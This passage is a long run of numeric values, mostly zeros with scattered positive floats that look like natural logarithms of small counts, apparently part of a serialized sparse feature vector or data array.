0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 5.16396083649347, 0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 3.367295829986474, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 5.111987788356544, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 5.101797476893978, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 7.917171988845775, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 5.346437018291705, 0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.215149976722676, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 3.0841946160253877, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 11.08366673682469, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 2.4849066497880004, 2.0794415416798357, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, \n 0.0, 0.0, 5.780743515792329, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 1.7412592803704001, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, \n 5.41610040220442, 0, 0.0, 0.0, 4.581130849408909, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0, 0.0, \n 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 5.991464547107983, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.605170185988092, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 7.869976334119211, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 4.330733340286331, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 2.995732273553991, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 4.897839799950911, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 4.748123315783208, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 4.182806904693497, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0, 5.723585101952381, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 4.454347296253507, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.8398715690385097,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 